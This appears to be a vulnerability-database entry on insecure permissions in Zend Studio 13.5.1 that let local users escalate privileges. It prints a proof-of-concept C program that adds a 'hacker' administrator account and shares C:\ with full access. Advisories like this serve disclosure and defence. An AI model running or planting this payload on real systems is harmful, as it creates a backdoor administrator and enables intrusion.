Details
A vulnerability was found in Zend Studio 13.5.1. It has been classified as problematic. Affected is an unknown code block of the component File Permission. The manipulation with an unknown input leads to a privileges management vulnerability. CWE is classifying the issue as CWE-269. The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. This is going to have an impact on confidentiality, integrity, and availability.
The weakness was released 10/12/2016 by John Page (hyp3rlinx) as not defined mailinglist post (Bugtraq). The advisory is available at seclists.org. The exploitability is told to be easy. Local access is required to approach this attack. The requirement for exploitation is a authentication. Technical details are unknown but a public exploit is available. This vulnerability is assigned to T1068 by the MITRE ATT&CK project. The advisory points out:
ZendStudio IDE uses weak insecure permissions settings on its files/directory as the ?Everyone? group has full access on it. Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges on the affected system. "Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest and LOCAL_SERVICE.
A public exploit has been developed by John Page in ANSI C and been published immediately after the advisory. The exploit is shared for download at seclists.org. It is declared as proof-of-concept. The vulnerability was handled as a non-public zero-day exploit for at least 12 days. During that time the estimated underground price was around $25k-$100k. The code used by the exploit is:
#include<windows.h>
int main(void){
system("net user hacker abc123 /add");
system("net localgroup Administrators hacker /add");
system("net share SHARE_NAME=c:\ /grant:hacker,full");
WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0);
return 0;
}There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
